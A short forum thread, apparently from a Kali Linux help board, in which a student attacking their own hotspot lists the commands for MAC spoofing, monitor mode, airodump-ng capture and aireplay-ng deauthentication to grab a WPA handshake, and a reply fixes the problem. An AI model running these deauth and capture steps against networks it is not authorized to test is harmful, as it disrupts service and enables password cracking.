Results 1 to 3 of 3

Thread: WPA-handshake is not capturing in Kali inside VM virtual box.

  1. #1
    Join Date
    2019-Dec
    Posts
    2

    Red face WPA-handshake is not capturing in Kali inside VM virtual box.

    Hi all,

    I bought AWUS036NHA ALFA USB Adapter and trying to attack my own mobile network which is connected with another mobile. I am using Kali inside virtual box.
    I have used below command so far to capture WPA-handshake.

    ifconfig
    ifconfig wlan0 down
    macchanger -m 00:11:22:33:44:55 wlan0
    clear

    ifconfig wlan0 up
    clear

    airmon-ng check kill
    airmon-ng start wlan0
    clear

    airodump-ng wlan0mon
    ctrl+c
    clear

    airodump-ng -c (channel no) --bssid (bssid no) -w test wlanomon

    then i open another terminal and used

    aireplay-ng --deauth 10 -a (BSSIDno) wlan0mon

    my mobile device can disconnect but it's not capturing handshake. I am so worried about it. Because i am working on my final year project. Please help me out. Thanks.

  2. #2
    Join Date
    2016-Dec
    Posts
    806
    Try without using MAC Changer, this can cause issues with some drivers

  3. #3
    Join Date
    2019-Dec
    Posts
    2
    Quote Originally Posted by Mister_X View Post
    Try without using MAC Changer, this can cause issues with some drivers
    Thank you for your response. Now it's working fine.

Similar Threads

  1. Airodump Not Capturing WPA Handshake
    By SierraNetworking in forum TroubleShooting Archive
    Replies: 2
    Last Post: 2023-01-30, 06:02
  2. Wifite not capturing WPA handshake
    By cybeh in forum General Archive
    Replies: 15
    Last Post: 2017-06-23, 08:13
  3. Problem with capturing handshake with new version of Kali
    By Animal in forum TroubleShooting Archive
    Replies: 14
    Last Post: 2015-10-31, 10:53
  4. Aircrack keeps capturing old Handshake
    By flyinghaggis in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2013-12-06, 14:22

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •